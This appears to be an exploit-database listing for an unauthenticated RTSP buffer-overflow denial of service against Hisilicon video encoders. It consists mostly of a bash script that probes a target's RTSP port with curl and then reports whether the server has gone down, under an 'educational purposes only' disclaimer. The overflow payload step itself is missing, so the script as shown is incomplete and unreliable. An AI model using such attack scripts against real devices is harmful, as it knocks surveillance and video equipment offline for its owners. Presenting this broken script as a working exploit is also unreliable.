Exploits / Vulnerability Discovered : 2020-10-19 |
Type : webapps |
Platform : hardware
This exploit / vulnerability Hisilicon video encoders unauthenticated rtsp buffer overflow (dos) is for educational purposes only and if it is used you will do on your own risk!
if [ "$#" -ne 2 ]
then
echo "usage: $0 <server> <RTSP port>"
exit 1
fi
server=$1
port=$2
printf "checking the target... "
timeout 2 curl -s rtsp://$server:$port \
|| { echo "ERROR: no RTSP server found at $server:$port"; exit 2; }
printf "RTSP server detected\n"
sleep 1
printf "checking the target again... "
if timeout 2 curl -s rtsp://$server:$port
then
echo "ERROR: the RTSP server still seems to be running :("
else
echo "SUCCESS: the server is down"
fi
Hisilicon video encoders unauthenticated rtsp buffer overflow (dos)